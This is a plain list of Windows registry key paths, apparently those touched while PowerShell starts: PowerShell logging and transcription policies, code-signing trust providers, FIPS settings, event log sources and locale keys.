HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.System.Management.Automation.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\State
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Safety Warning Level
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1A610570-38CE-11D4-A2A3-00104BD35090}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptSIPDllIsMyFileType2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9FA65764-C36F-4319-9737-658A34585BB7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{AB13F5B1-F718-11D0-82AA-00AA00C065E1}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptSIPDllPutSignedDataMsg
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9FA65764-C36F-4319-9737-658A34585BB7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{AB13F5B1-F718-11D0-82AA-00AA00C065E1}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptSIPDllGetSignedDataMsg
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription\EnableTranscripting
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription\OutputDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription\EnableInvocationHeader
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\TZI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\MUI_Display
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\MUI_Std
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\MUI_Dlt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Caching__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Caching__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.EnterpriseServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.EnterpriseServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FeatureSIMD
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\PSMODULEPATH
HKEY_CURRENT_USER\Environment
HKEY_CURRENT_USER\Environment\PSMODULEPATH
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Security__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Security__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\HardwareEvents
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Internet Explorer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Key Management Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Media Center
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Media Center\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\OAlerts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Security\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Windows PowerShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Windows PowerShell\PowerShell
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ar
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ar
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bg-BG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bg-BG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\da
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\da
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\el
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\el
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\he
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\he
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\is
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\is
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\is-IS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\is-IS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ja
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ja
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ja-JP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ja-JP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ko
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ko
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ko-KR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ko-KR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\no
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\no
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rm-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rm-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ro
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ro
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ro-RO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ro-RO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ru
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ru
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hr-HR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hr-HR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sq
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sq
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sq-AL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sq-AL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv
